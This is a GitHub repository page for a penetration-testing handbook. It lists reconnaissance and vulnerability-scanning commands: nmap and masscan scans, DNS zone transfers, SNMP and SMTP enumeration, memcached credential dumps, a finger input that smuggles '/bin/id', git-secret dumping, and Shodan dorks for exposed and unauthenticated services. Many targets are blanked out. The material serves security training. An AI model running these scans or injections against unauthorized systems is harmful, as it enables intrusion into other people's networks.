https://github.com/txuswashere/cybersecurity-handbooks
Cybersecurity-Handbooks
https://github.com/txuswashere/cybersecurity-handbooks
attack-defense cloud cryptography cybersec cybersecurity cybersecurity-education cybersecurity-tools cybersecurity-training forensics osint password reconnaissance reverse-engineering wireless wireless-security
Last synced: about 1 month ago
JSON representation
Cybersecurity-Handbooks
- Host: GitHub
- URL: https://github.com/txuswashere/cybersecurity-handbooks
- Owner: txuswashere
- Created: 2024-02-28T10:44:03.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-02-28T10:50:00.000Z (about 1 year ago)
- Last Synced: 2025-01-30T13:27:56.700Z (3 months ago)
- Topics: attack-defense, cloud, cryptography, cybersec, cybersecurity, cybersecurity-education, cybersecurity-tools, cybersecurity-training, forensics, osint, password, reconnaissance, reverse-engineering, wireless, wireless-security
- Homepage:
- Size: 509 KB
- Stars: 2
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Cybersecurity-Handbooks
# Information Gathering
## Table of Contents
- [Amass](#amass)
- [Banner Grabbing](#banner-grabbing)
- [Common Ports](#common-ports)
- [dmitry](#dmitry)
- [DMARC](#dmarc)
- [DNS](#dns)
- [dnsenum](#dnsenum)
- [dnsrecon](#dnsrecon)
- [Enyx](#enyx)
- [finger](#finger)
- [MASSCAN](#masscan)
- [memcached](#memcached)
- [Naabu](#naabu)
- [netdiscover](#netdiscover)
- [NetBIOS](#netbios)
- [Nmap](#nmap)
- [onesixtyone](#onesixtyone)
- [Outlook Web Access (OWA)](#outlook-web-access-owa)
- [Port Scanning](#port-scanning)
- [SMTP](#stmp)
- [SNMP](#snmp)
- [snmp-check](#snmp-check)
- [SNMP-MIBS-Downloader](#snmp-mibs-downloader)
- [snmpwalk](#snmpwalk)
- [SPF](#spf)
- [sslscan](#sslscan)
- [sslyze](#sslyze)
- [subfinder](#subfinder)
- [tcpdump](#tcpdump)
- [Time To Live (TTL) and TCP Window Size Values](#time-to-live-ttl-and-tcp-window-size-values)
## Resources
| Name | Description | URL |
| --- | --- | --- |
| Amass | The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques. | https://github.com/OWASP/Amass |
| ASNLookup | Quickly look up updated information about specific ASN, Organization or registered IP addresses (IPv4 and IPv6) among other relevant data. | https://asnlookup.com |
| ASNmap | Go CLI and Library for quickly mapping organization network ranges using ASN information. | https://github.com/projectdiscovery/asnmap |
| BashScan | BashScan is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap. | https://github.com/astryzia/BashScan |
| Censys | Attack Surface Management | https://search.censys.io |
| crt.sh | Certificate Search | https://crt.sh |
| crt.sh CLI | Certificate Search | https://github.com/az7rb/crt.sh |
| CTFR | CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs. | https://github.com/UnaPibaGeek/ctfr |
| DNSdumpster | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. | https://dnsdumpster.com |
| dnsx | dnsx is a fast and multi-purpose DNS toolkit allow to run multiple probes using retryabledns library, that allows you to perform multiple DNS queries of your choice with a list of user supplied resolvers, additionally supports DNS wildcard filtering like shuffledns. | https://github.com/projectdiscovery/dnsx |
| Driftnet | Exposure Analysis | https://driftnet.io |
| Hardenize | Network Perimeter Monitoring | https://www.hardenize.com |
| IPinfo | Accurate IP address data that keeps pace with secure, specific, and forward-looking use cases. | https://ipinfo.io |
| Jackdaw | Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. | https://github.com/skelsec/jackdaw |
| katana | A next-generation crawling and spidering framework. | https://github.com/projectdiscovery/katana |
| Knock Subdomain Scan | Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack. | https://github.com/guelfoweb/knock |
| Minimalistic Offensive Security Tools | Minimalistic TCP and UDP port scanners. | https://github.com/InfosecMatter/Minimalistic-offensive-security-tools |
| naabu | Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. | https://github.com/projectdiscovery/naabu |
| Nmap | Network Scanner | https://github.com/nmap/nmap |
| proxify | Swiss Army Knife Proxy for rapid deployments. | https://github.com/projectdiscovery/proxify |
| reconFTW | Reconnaissance Automation | https://github.com/six2dez/reconftw |
| Spoofy | Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. | https://github.com/MattKeeley/Spoofy |
| subfinder | Fast passive subdomain enumeration tool. | https://github.com/projectdiscovery/subfinder |
| wtfis | Passive hostname, domain and IP lookup tool for non-robots | https://github.com/pirxthepilot/wtfis |
## Amass
> https://github.com/OWASP/Amass
```c
$ amass enum -d
$ amass intel --asn
$ amass intel --asn -list
$ amass enum -active -d -p 80,443,8080
```
## Banner Grabbing
> https://book.hacktricks.xyz/pentesting/pentesting-imap#banner-grabbing
```c
$ nc -v 80
$ telnet 80
$ curl -vX
```
## Common Ports
| Port | Service |
| --- | --- |
| 21/TCP | FTP |
| 22/TCP | SSH |
| 25/TCP | SMTP |
| 53/TCP | DNS |
| 53/UDP | DNS |
| 80/TCP | HTTP |
| 135/TCP | RPC |
| 139/TCP | Netbios |
| 443/TCP | HTTPS |
| 445/TCP | SMB |
| 1723/TCP | VPN |
| 3389/TCP | RDP |
| 5985/TCP | WinRM |
### Domain Controller specific Ports
| Port | Service |
| --- | --- |
| 88/TCP | Kerberos |
| 389/TCP | LDAP |
| 636/TCP | LDAPS |
| 445/TCP | SMB |
## dmitry
```c
$ dmitry -p
```
## DMARC
```c
$ dig txt _dmarc. | grep dmarc
```
## DNS
```c
$ whois
$ dig @ -x
$ dig {a|txt|ns|mx}
$ dig {a|txt|ns|mx} @ns1.
$ dig axfr @ // zone transfer - needs 53/TCP
$ host -t {a|txt|ns|mx}
$ host -a
$ host -l ns1.
$ nslookup -> set type=any -> ls -d
$ for sub in $(cat subDOMAINs.txt);do host $sub.
$ dnsenum --threads 64 --dnsserver -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
```
## dnsrecon
```c
$ sudo vi /etc/hosts
$ dnsrecon -r 127.0.0.0/24 -n
$ dnsrecon -r 127.0.1.0/24 -n
$ dnsrecon -d -t axfr @ns2.
```
## Enyx
> https://github.com/trickster0/Enyx
### Grabbing IPv6 Address
```c
$ python enyx.py 2c public
```
## finger
### finger Port 79/TCP
```c
$ finger root@
$ finger "|/bin/id@"
msf6 > use auxiliary/scanner/finger/finger_users
```
> https://github.com/pentestmonkey/finger-user-enum
```c
$ ./finger-user-enum.pl -U users.txt -t
```
## MASSCAN
> https://github.com/robertdavidgraham/masscan
```c
$ sudo masscan -e tun0 -p0-65535 --max-rate 500 --interactive
```
## memcached
> https://github.com/pd4d10/memcached-cli
```c
memcrashed / 11211/UDP
$ npm install -g memcached-cli
$ memcached-cli :@:11211
$ echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211
STAT pid 21357
STAT uptime 41557034
STAT time 1519734962
$ sudo nmap -p 11211 -sU -sS --script memcached-info
$ stats items
$ stats cachedump 1 0
$ get link
$ get file
$ get user
$ get passwd
$ get account
$ get username
$ get password
```
## Naabu
```c
$ sudo naabu -p - -l /PATH/TO/FILE/ -o /PATH/TO/FILE/
```
## netdiscover
```c
$ sudo netdiscover -i -r
```
## NetBIOS
```c
$ nbtscan
$ nmblookup -A
```
## Nmap
```c
$ nmap -A -T4 -p- -sS -sV -oN initial --script discovery
$ nmap -A -T4 -sC -sV --script vuln
$ nmap -sV --script http-trace
$ nmap -sV --script ssl-cert -p 443
$ nmap -sV --script ssl-enum-ciphers -p 443
$ nmap -A -T4 -p-
$ nmap -A -T4 -sS -sU -v
$ nmap -sC -sV -oN initial --script discovery
$ nmap -sC -sV -oA nmap
$ nmap -sS -sV
$ nmap -p- // full port scan
$ nmap -sS // ping scan
$ nmap -sT // TCP scan
$ nmap -sU // UDP scan
$ nmap -PR -sN // ARP scan
$ nmap -PP -sn // ICMP timestamp discovery
$ nmap -PM -sn // ICMP address mask discovery
$ nmap -PE -sn // ICMP echo discovery
$ nmap -PU -sn // UDP ping discovery
$ nmap -PS // TCP SYN ping discovery
$ nmap -PA // TCP ACK ping discovery
$ sudo nmap -sS -f -p // fragment packets for stealth
$ sudo nmap -sS -ff -p // fragmets packets double times for stealth
$ nmap --script safe -p 445 // detailed scan on smb
-p1-65535 // ports
-p- // all ports
-sV // version detection
-sS // TCP SYN scan
-sT // TCP connect scan
-sU // UDP scan
-sX // Xmas scan (sets FIN, PSH, URG flags)
-sC // script scan
-T4 // timing options
-PN // no ping
-oA // write to file (basename)
-oN // write to file (normal)
-sn // host discovery only
-6 // IPv6
-n // no dns resolution
-O // OS detection
-A // aggressive scan
-D // Decoy scan
-f // fragment packets
-S // spoof src ip address
-g // spoof src port
-n // no DNS lookup
-R // Reverse DNS lookup
--mtu // set MTU size
--spoof-mac // spoof mac address
--data-length // append random data
--scan-delay 5s // delay
--max-retries 1 // set retry limit to speed the scan up
```
### Getting Script Locations
```c
$ ls -lh /usr/share/nmap/scripts/*ssh*
$ locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb
```
### Converting Report
```c
$ xsltproc nmap.xml -o nmap.html
```
### Network Sweep Scan
```c
$ sudo nmap -sn .1-253
$ sudo nmap -sS .1-253
```
#### Enable Monitoring with iptables
```c
$ sudo iptables -I INPUT 1 -s -j ACCEPT
$ sudo iptables -I OUTPUT 1 -d -j ACCEPT
$ sudo iptables -Z
```
#### Check for Connections
```c
$ sudo iptables -vn -L
```
### Generate grepable Output for IP Addresses and Ports
```c
$ sudo nmap .1-253 -oG
$ sudo nmap -p .1-253 -oG
```
```c
$ grep Up | cut -d " " -f 2
$ grep open | cut -d " " -f2
```
#### Alternative
```c
$ sudo nmap -iL /PATH/TO/FILE/ -p- -oG /PATH/TO/FILE/ | awk -v OFS=':' '/open/ {for (i=4;i<=NF;i++) {split($i,a,"/"); if (a[2]=="open") print $2, a[1]}}' | sort | uniq > /PATH/TO/FILE/
```
### ASN
```c
$ nmap --script targets-asn --script-args targets-asn.asn=
```
### SMB
```c
$ nmap -sV --script=smb-enum-shares -p 445
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
```
### Port Knocking
```c
$ for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x ; done
```
### RPC
```c
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
```
### Kerberos
```c
$ nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
```
### File transfer (PUT)
```c
$ nmap -p 80 --script http-put --script-args http-put.url='',http-put.file=''
```
## onesixtyone
> https://github.com/trailofbits/onesixtyone
### Basic Usage
```c
$ echo public >
$ echo private >>
$ echo manager >>
```
```c
$ for ip in $(seq 1 254); do echo .$ip; done >
```
```c
$ onesixtyone -c -i
```
### Brute-Force Community Strings
```c
$ onesixtyone -i snmp-ips.txt -c community.txt
```
## Outlook Web Access (OWA)
```c
https:///sitemap.xml
```
## Port Scanning
```c
$ for p in {1..65535}; do nc -vn $p -w 1 -z & done 2> .txt
```
> https://github.com/AlexRandomed/One-Liner-Bash-Scanner
```c
$ export ip=; for port in $(seq 1 65535); do timeout 0.01 bash -c " /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done
```
## SMTP
```c
telnet 10.10.10.77 25
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO foobar.com
250 Hello.
MAIL FROM:
250 OK
RCPT TO:
250 OK
RCPT TO:
250 OK
RCPT TO:
250 OK
RCPT TO:
250 OK
$ smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t
$ smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t
$ smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t
```
## SNMP
### SNMP Byte Calculation
```c
$ python3
Python 3.9.7 (default, Sep 3 2021, 06:18:44)
[GCC 10.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import binascii
>>> s='50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135'
>>> binascii.unhexlify(s.replace(' ',''))
b'P@ssw0rd@123!!123\x13\x91q\x81\x92"2Rbs\x03\x133CSs\x83\x94$4\x95\x05\x15Eu\x86\x16WGW\x98(8i\t\x19IY\x81\x03\x10a\x11\x11A\x15\x11\x91"\x121&\x13\x011\x13A5'
```
## snmp-check
```c
$ snmp-check
$ snmp-check -t -c public
```
## SNMP-MIBS-Downloader
> https://github.com/codergs/SNMP-MIBS-Downloader
```c
$ sudo apt-get install snmp-mibs-downloader
```
### Comment out "mibs: line"
```c
$ sudo vi /etc/snmp/snmp.conf
```
## snmpwalk
### Common Commands
```c
$ snmpwalk -c public -v1
$ snmpwalk -c internal -v2c
```
### Examples
#### Detailed Output
```c
$ snmpwalk -v2c -c public .1
```
#### Windows Hostname
```c
$ snmpwalk -c public -v1 .1.3.6.1.2.1.1.5
```
#### OS / User Details
```c
$ snmpwalk -v2c -c public nsExtendObjects
```
#### Windows User Enumeration
```c
$ snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25
```
#### Windows Process Enumeration
```c
$ snmpwalk -c public -v1 1.3.6.1.2.1.25.4.2.1.2
```
#### Windows Share Information
```c
$ snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.27
$ snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.3.1.1
```
#### Installed Software
```c
$ snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2
```
#### Network Addresses
```c
$ snmpwalk -v2c -c public 1.3.6.1.2.1.4.34.1.3
```
#### TCP Ports
```c
$ snmpwalk -c public -v1 1.3.6.1.2.1.6.13.1.3
```
## SPF
```c
$ dig txt | grep spf
```
## sslscan
```c
$ sslscan
```
## sslyze
```c
$ sslyze
```
## subfinder
```c
$ subfinder -dL /PATH/TO/FILE/
$ subfinder -dL /PATH/TO/FILE/ -nW -ip -p /PATH/TO/FILE/
```
### Scan for Top Routinely Exploited Vulnerabilities according to CISA
```c
$ subfinder -d -all -silent | httpx -silent | nuclei -rl 50 -c 15 -timeout 10 -tags cisa -vv
```
## tcpdump
```c
$ tcpdump -envi host -s0 -w /PATH/TO/FILE/.pcap
```
## Time To Live (TTL) and TCP Window Size Values
| Operating System | Time to Live | TCP Window Size |
| --- | --- | --- |
| Linux Kernel 2.4 and 2.6) | 64 | 5840 |
| Google Linux | 64 | 5720 |
| FreeBSD | 64 | 65535 |
| OpenBSD | 64 | 16384 |
| Windows 95 | 32 | 8192 |
| Windows 2000 | 128 | 16384 |
| Windows XP | 128 | 65535 |
| Windows 98, Vista and 7 (Server 2008) | 128 | 8192 |
| iOS 12.4 (Cisco Routers) | 255 | 8760 |
| AIX 4.3 | 64 | 16384 |
# Vulnerability Analysis
## Table of Contents
- [Aquatone](#aquatone)
- [Legion](#legion)
- [nikto](#nikto)
- [Nuclei](#nuclei)
- [Shodan](#shodan)
## Resources
| Name | Description | URL |
| --- | --- | --- |
| Aquatone | A Tool for Domain Flyovers | https://github.com/michenriksen/aquatone |
| Can I takeover XYZ | "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. | https://github.com/EdOverflow/can-i-take-over-xyz |
| EyeWitness | EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. | https://github.com/RedSiege/EyeWitness |
| gowitness | gowitness - a golang, web screenshot utility using Chrome Headless | https://github.com/sensepost/gowitness |
| nikto | Nikto web server scanner | https://github.com/sullo/nikto |
| Nuclei | Fast and customizable vulnerability scanner based on simple YAML based DSL. | https://github.com/projectdiscovery/nuclei |
| Shodan | Shodan is the world's first search engine for Internet-connected devices. | https://shodan.io |
| Sparta | Network Infrastructure Penetration Testing Tool | https://github.com/SECFORCE/sparta |
## Aquatone
> https://github.com/michenriksen/aquatone
### Testing for Subdomain Takeover
```c
$ cat .txt | aquatone
```
## Legion
> https://github.com/GoVanguard/legion/
```c
$ sudo legion
```
## nikto
> https://github.com/sullo/nikto
```c
$ nikto -h
$ nikto -host 127.0.0.1 -useproxy http://:3128
```
## Nuclei
> https://github.com/projectdiscovery/nuclei
### Scanning Target
```c
$ nuclei -target https:// -t nuclei-templates
```
### Rate Limiting
```c
$ nuclei -target https:// -t nuclei-templates -rate-limit 5
```
### Set HTTP Header
```c
$ nuclei -target https:// -t nuclei-templates -header "User-Agent: Pentest" -header 'X-Red-Team: Assessment'
```
### Debugging Output
```c
$ nuclei -l /PATH/TO/FILE/ -t /PATH/TO/TEMPALTES/ -debug-req -rl 10
```
### CISA Vulnerability Scan
```c
$ nuclei -tags cisa -list /PATH/TO/FILE/
```
### Finding Git-Secrets
```c
$ ./nuclei -u https:// -t /PATH/TO/TEMPLATES/exposures/configs/git-config.yaml
$ ./gitdumper.sh https:///.git/ /PATH/TO/FOLDER
$ ./extractor.sh /PATH/TO/FOLDER /PATH/TO/FOLDER/
$ ./trufflehog filesystem /PATH/TO/FOLDER/
```
## Shodan
> https://help.shodan.io/command-line-interface/0-installation
### Initialising
```c
$ pip install shodan
$ shodan init
```
### Searches
```c
$ shodan search 'ASN:AS'
$ shodan search 'ASN:AS has_vuln:true'
$ shodan search --fields ip_str,port,org,hostnames 'asn:'
$ shodan search --fields ip_str,port,org,hostnames 'asn: port:443'
$ shodan search --fields ip_str,port,org,hostnames 'asn: vuln:cve-2021-40449'
$ shodan stats --facets ssl.version asn: has_ssl:true http
$ shodan domain
$ shodan honeyscore
$ shodan count vuln:cve-2021-40449
$ shodan stats --facets vuln country:US // top 10 vulnerabilities in America
$ shodan search 'd-Link Internet Camera, 200 OK' // d-link cameras
$ shodan search '230 login successful port:21' // ftp access
$ shodan search 'product:MySQL' // mysql databases
$ shodan search 'port:9200 json' // elastic search
$ shodan search 'hacked-router-help-sos' // hacked routers
$ shodan search 'IPC$ all storage devices' // attached storages
$ shodan search '"authentication disabled" port:5900,5901' // vnc servers without authentication
$ shodan search 'http.favicon.hash:81586312' // default jenkins installations
$ shodan search 'http.favicon.hash:-1028703177' // TP-Link Routers
```
### Dorks
```c
hostname:
http.title:"title"
http.html:"/file"
html:"context"
server: "apache 2.2.3"
asn:AS
http.status:200
http.favicon.hash:""
port:"23"
mysql port:"3306"
proftpd port:21
os:"Linux"
os"windows 7
country:"UK"
"city: London"
product:"nginx"
Server: SQ-WEBCAM
title:"xzeres wind"
title:"Directory listing for /"
Ssl.cert.subject.CN:"" -http.title:"Invalid URL" 200
geo:"51.5074, 0.1278"
port:5432 PostgreSQL
port:"25" product:"exim"
os:"Windows 10 Home 19041"
"port: 53" Recursion: Enabled
"MongoDB Server Information" port:27017 -authentication
"Set-Cookie: mongo-express=" "200 OK"
port:"9200" all:"elastic indices"
"220" "230 Login successful." port:21
port:"11211" product:"Memcached"
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
port:8291 os:"MikroTik RouterOS 6.45.9"
product:"Apache httpd" port:"80"
product:"Microsoft IIS httpd"
"port: 8080" product:"nginx"
ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com
ssl.cert.expired:true
"Server: yawcam" "Mime-Type: text/html"
port:5006,5007 product:mitsubishi
"Server: gSOAP/2.8" "Content-Length: 583"
"authentication disabled" "RFB 003.008"
"Authentication: disabled" port:445
"X-Plex-Protocol" "200 OK" port:32400
"220" "230 Login successful." port:21
"Serial Number:" "Built:" "Server: HP HTTP"
"SERVER: EPSON_Linux UPNP" "200 OK"
```
### Creating Alert
```c
$ shodan alert create && shodan stream --alerts=all
```
### Parsing Script
```c
#!/bin/bash
input="hosts.txt"
while read -r line
do
shodan host $line; sleep 3
done < "$input"
```
### API Calls
```c
$ curl -s https://api.shodan.io/api-info?key= | jq
$ curl -s https://api.shodan.io/shodan/host/1.1.1.1?key= | jq
```
### Shodan to Nuclei
```c
$ shodan search vuln:CVE-2021-26855 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t /PATH/TO/TEMPLATES/CVE/2021/CVE-2021-26855.yaml
```
### Web Search
```c
city:""
"Server: gws" hostname:"google"
cisco net:"216.219.143.0/24"
Apache city:"" port:"8080" product:"Apache Tomcat/Coyote JSP engine"
```
### MQTT Search
```c
mqtt port:1883
```
### k8s Search
> https://help.shodan.io/command-line-interface/0-installation
```c
'http.html:/apis/apiextensions.k8s.io'
```
Browse: /api/v1/secrets
### Cobalt Strike Servers
```c
"HTTP/1.1 404 Not Found" "Content-Type: text/plain" "Content-Length: 0" "Date" -"Server" -"Connection" -"Expires" -"Access-Control" -"Set-Cookie" -"Content-Encoding" -"Charset"
```
### Metasploit
```c
ssl:"MetasploitSelfSignedCA" http.favicon.hash:"-127886975"
```
### Empire
```c
http.html_hash:"611100469"
```
### Responder
```c
"HTTP/1.1 401 Unauthorized" "Date: Wed, 12 Sep 2012 13:06:55 GMT"
```
# Web Application Analysis
## Table of Contents
- [2FA Bypass Techniques](#2fa-bypass-techniques)
- [403 Bypass](#403-bypass)
- [Asset Discovery](#asset-discovery)
- [Burp Suite](#burp-suite)
- [Bypassing File Upload Restrictions](#bypassing-file-upload-restrictions)
- [cadaver](#cadaver)
- [Command Injection](#command-injection)
- [commix](#commix)
- [Common File Extensions](#common-file-extensions)
- [curl](#curl)
- [davtest](#davtest)
- [DirBuster](#dirbuster)
- [Directory Traversal Attack](#directory-traversal-attack)
- [dirsearch](#dirsearch)
- [DNS Smuggling](#dns-smuggling)
- [DS_Walk](#ds_walk)
- [Favicon](#favicon)
- [feroxbuster](#feroxbuster)
- [ffuf](#ffuf)
- [Flask-Unsign](#flask-unsign)
- [gf](#gf)
- [GitHub](#github)
- [GitTools](#gittools)
- [GIXY](#gixy)
- [Gobuster](#gobuster)
- [gron](#gron)
- [hakcheckurl](#hakcheckurl)
- [Hakrawler](#hakrawler)
- [Host Header Regex Bypass](#host-header-regex-bypass)
- [HTML Injection](#html-injection)
- [HTTP Request Methods](#http-request-methods)
- [HTTP Request Smuggling / HTTP Desync Attack](#http-request-smuggling--http-desync-attack)
- [httprobe](#httprobe)
- [httpx](#httpx)
- [Interactsh](#interactsh)
- [JavaScript](#javascript)
- [Jenkins](#jenkins)
- [jsleak](#jsleak)
- [JWT_Tool](#jwt_tool)
- [Kyubi](#kyubi)
- [Leaky Paths](#leaky-paths)
- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)
- [Lodash](#lodash)
- [Log Poisoning](#log-poisoning)
- [Magic Bytes](#magic-bytes)
- [mitmproxy](#mitmproxy)
- [ngrok](#ngrok)
- [OpenSSL](#openssl)
- [PadBuster](#padbuster)
- [PDF PHP Inclusion](#pdf-php-inclusion)
- [PHP](#php)
- [Poison Null Byte](#poison-null-byte)
- [Remote File Inclusion (RFI)](#remote-file-inclusion-rfi)
- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)
- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)
- [Subdomain Takeover](#subdomain-takeover)
- [Symfony](#symfony)
- [unfurl](#unfurl)
- [Upload Filter Bypass](#upload-filter-bypass)
- [Upload Vulnerabilities](#upload-vulnerabilities)
- [waybackurls](#waybackurls)
- [Web Log Poisoning](#web-log-poisoning)
- [Wfuzz](#wfuzz)
- [WhatWeb](#whatweb)
- [Wordpress](#wordpress)
- [WPScan](#wpscan)
- [XML External Entity (XXE)](#xml-external-entity-xxe)
- [XSRFProbe (Cross-Site Request Forgery / CSRF / XSRF)](#xsrfprobe-cross-site-request-forgery--csrf--xsrf)
- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
## Resources
| Name | Description | URL |
| --- | --- | --- |
| AllThingsSSRF | This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. | https://github.com/jdonsec/AllThingsSSRF |
| anew | A tool for adding new lines to files, skipping duplicates. | https://github.com/tomnomnom/anew |
| Arjun | HTTP Parameter Discovery Suite | https://github.com/s0md3v/Arjun |
| Awesome API Security | A collection of awesome API Security tools and resources. | https://github.com/arainho/awesome-api-security |
| cariddi | Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more. | https://github.com/edoardottt/cariddi |
| CipherScan | Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. | https://github.com/mozilla/cipherscan |
| Client-Side Prototype Pollution | In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact. | https://github.com/BlackFan/client-side-prototype-pollution |
| Commix | Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool. | https://github.com/commixproject/commix |
| cookie-monster | A utility for automating the testing and re-signing of Express.js cookie secrets. | https://github.com/DigitalInterruption/cookie-monster |
| DalFox | DalFox is an powerful open source XSS scanning tool and parameter analyzer and utility that fast the process of detecting and verify XSS flaws. | https://github.com/hahwul/dalfox |
| DOMXSS Wiki | The DOMXSS Wiki is a Knowledge Base for defining sources of attacker controlled inputs and sinks which potentially could introduce DOM Based XSS issues. | https://github.com/wisec/domxsswiki/wiki |
| DS_Walk | Python tool for enumerating directories and files on web servers that contain a publicly readable .ds_store file. | https://github.com/Keramas/DS_Walk |
| DumpsterDiver | DumpsterDiver is a tool, which can analyze big volumes of data in search of hardcoded secrets like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords. | https://github.com/securing/DumpsterDiver |
| EarlyBird | EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more. | https://github.com/americanexpress/earlybird |
| ezXSS | ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. | https://github.com/ssl/ezXSS |
| feroxbuster | A simple, fast, recursive content discovery tool written in Rust. | https://github.com/epi052/feroxbuster |
| ffuf | A fast web fuzzer written in Go. | https://github.com/ffuf/ffuf |
| gf | A wrapper around grep, to help you grep for things | https://github.com/tomnomnom/gf |
| GitDorker | GitDorker is a tool that utilizes the GitHub Search API and an extensive list of GitHub dorks that I've compiled from various sources to provide an overview of sensitive information stored on github given a search query. | https://github.com/obheda12/GitDorker |
| GitTools | This repository contains three small python/bash scripts used for the Git research. | https://github.com/internetwache/GitTools |
| Gobuster | Gobuster is a tool used to brute-force URIs, DNS subdomains, Virtual Host names and open Amazon S3 buckets | https://github.com/OJ/gobuster |
| grayhatwarfare shorteners | Search Shortener Urls | https://shorteners.grayhatwarfare.com |
| gron | Make JSON greppable! | https://github.com/tomnomnom/gron |
| Hakrawler | Fast golang web crawler for gathering URLs and JavaScript file locations. | https://github.com/hakluke/hakrawler |
| haktrails | Golang client for querying SecurityTrails API data. | https://github.com/hakluke/haktrails |
| httpbin | A simple HTTP Request & Response Service. | https://httpbin.org/#/ |
| httprobe | Take a list of domains and probe for working HTTP and HTTPS servers | https://github.com/tomnomnom/httprobe |
| httpx | httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads. | https://github.com/projectdiscovery/httpx |
| interact.sh | HTTP Request & Response Service | https://app.interactsh.com/#/ |
| ipsourcebypass | This Python script can be used to bypass IP source restrictions using HTTP headers. | https://github.com/p0dalirius/ipsourcebypass |
| Java-Deserialization-Cheat-Sheet | The cheat sheet about Java Deserialization vulnerabilities | https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet |
| JSFuck | JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code. | http://www.jsfuck.com |
| JSFuck []()!+ | Write any JavaScript with 6 Characters: []()!+ | https://github.com/aemkei/jsfuck |
| jsleak | jsleak is a tool to find secret , paths or links in the source code during the recon. | https://github.com/channyein1337/jsleak |
| JSON Web Tokens | JSON Web Token Debugger | https://jwt.io |
| JWT_Tool | The JSON Web Token Toolkit v2 | https://github.com/ticarpi/jwt_tool |
| KeyHacks | KeyHacks shows ways in which particular API keys found on a Bug Bounty Program can be used, to check if they are valid. | https://github.com/streaak/keyhacks |
| Leaky Paths | A collection of special paths linked to major web CVEs, known misconfigurations, juicy APIs ..etc. It could be used as a part of web content discovery, to scan passively for high-quality endpoints and quick-wins. | https://github.com/ayoubfathi/leaky-paths |
| Lodash | The Lodash library exported as a UMD module. | https://github.com/lodash/lodash |
| ngrok | ngrok is the programmable network edge that adds connectivity, security, and observability to your apps with no code changes. | https://ngrok.com |
| Notify | Notify is a Go-based assistance package that enables you to stream the output of several tools (or read from a file) and publish it to a variety of supported platforms. | https://github.com/projectdiscovery/notify |
| NtHiM | Super Fast Sub-domain Takeover Detection | https://github.com/TheBinitGhimire/NtHiM |
| Oralyzer | Oralyzer, a simple python script that probes for Open Redirection vulnerability in a website. | https://github.com/r0075h3ll/Oralyzer |
| PayloadsAllTheThings | A list of useful payloads and bypasses for Web Application Security. | https://github.com/swisskyrepo/PayloadsAllTheThings |
| PHPGGC | PHPGGC: PHP Generic Gadget Chains | https://github.com/ambionics/phpggc |
| pingb | HTTP Request & Response Service | http://pingb.in |
| Recox | The script aims to help in classifying vulnerabilities in web applications. | https://github.com/samhaxr/recox |
| reNgine | The only web application recon tool you will ever need! | https://github.com/yogeshojha/rengine |
| Request Catcher | Request Catcher will create a subdomain on which you can test an application. | https://requestcatcher.com |
